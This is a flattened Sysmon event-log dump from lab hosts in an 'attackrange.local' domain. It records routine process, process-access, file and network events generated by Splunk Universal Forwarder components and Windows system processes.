Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4C6739D8F07FF0686B9EB02D6B20283,SHA256=F176F1553E25D7B2A9ADA05179A8D78A154FF3E93BEC92C5F4D1A636A19CE553,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001049337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:40.652{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51044-false10.0.1.12-8000- 23542300x8000000000000000807851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:49.540{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62266F6335D1C6C00A092B12BF1C408D,SHA256=C16197B589A565A73978267915EA9768333E8AB8957DF87485CC7A077BA77BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:49.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193D61DAB367259523A0D8CD40653668,SHA256=D163286000687A2F9F2BDABA9B5B1E39075F8F096C0D22F4033F639A3A6CEC8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:50.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E0B5DCC3283E9E0C0F933265DF9EA8,SHA256=1B33390958179A9266F0865E8BBAAD576D081971A4B7B08C6CCF4186D2AD0408,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001049355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.927{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.226{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.028{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F480674BD6943732B1A5521E408FCF07,SHA256=659CAE03C0D7274FB19A3DBC7D5B63B80CC9A593720679CAEA4DDF5F1509AB2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:51.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C68932BB97FF203B4C6E7D1E7F7447,SHA256=40F37FA8675C797F61B71E17D65BF3A8115D28390434AFE63C87B8A1EE753BC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.713{466BC892-F50F-60EB-477D-00000000CF01}96329608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:53:51.435{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.435{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:51.431{466BC892-F50F-60EB-477D-00000000CF01}9632C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program 